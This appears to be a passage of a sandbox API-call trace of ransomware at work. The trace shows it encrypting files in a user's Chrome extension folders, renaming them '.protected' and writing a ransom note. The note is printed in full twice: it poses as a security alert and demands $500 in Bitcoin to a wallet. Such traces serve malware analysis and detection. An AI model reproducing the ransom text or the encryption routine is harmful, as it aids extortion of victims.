WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.479] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.479] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.479] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.479] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.479] CloseHandle (hObject=0x164) returned 1 [0081.479] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.479] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0081.479] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0081.479] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0081.479] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0081.479] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0081.479] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv") returned 141 [0081.479] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0081.479] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0081.479] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\*") returned 143 [0081.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.479] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.480] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.480] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.480] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.480] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.480] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\.") returned 143 [0081.480] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.480] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.480] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.480] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.480] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.480] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.480] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.480] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\..") returned 144 [0081.480] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.480] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.480] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.480] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.480] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.480] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.480] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.480] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.480] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json") returned 155 [0081.480] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.480] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.480] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.481] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.481] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json") returned 155 [0081.481] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.481] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json") returned 155 [0081.481] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.481] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json") returned 155 [0081.481] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.481] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xee, lpOverlapped=0x0) returned 1 [0081.483] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff12, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.483] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xee, lpOverlapped=0x0) returned 1 [0081.483] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.483] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.483] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.483] CloseHandle (hObject=0x168) returned 1 [0081.483] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.protected") returned 165 [0081.483] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.protected")) returned 1 [0081.484] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.484] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.484] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\RESTORE_FILES.txt") returned 159 [0081.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.484] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.484] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.485] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.485] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.485] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.485] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.485] CloseHandle (hObject=0x164) returned 1 [0081.485] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.485] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0081.485] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0081.485] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0081.485] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0081.485] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0081.485] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl") returned 141 [0081.485] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0081.485] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0081.485] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\*") returned 143 [0081.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.486] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.486] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.486] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.486] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.486] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\.") returned 143 [0081.486] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.486] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.486] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.486] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.486] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.486] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.486] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\..") returned 144 [0081.486] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.486] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.486] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.486] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.486] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.486] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.486] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.486] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json") returned 155 [0081.486] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.486] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.486] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.486] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json") returned 155 [0081.487] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json") returned 155 [0081.487] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json") returned 155 [0081.487] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.487] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe8, lpOverlapped=0x0) returned 1 [0081.487] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.487] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe8, lpOverlapped=0x0) returned 1 [0081.487] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.488] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.488] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.488] CloseHandle (hObject=0x168) returned 1 [0081.488] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.protected") returned 165 [0081.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.protected")) returned 1 [0081.489] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.489] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.489] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\RESTORE_FILES.txt") returned 159 [0081.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.489] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.489] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.490] lstrlenA 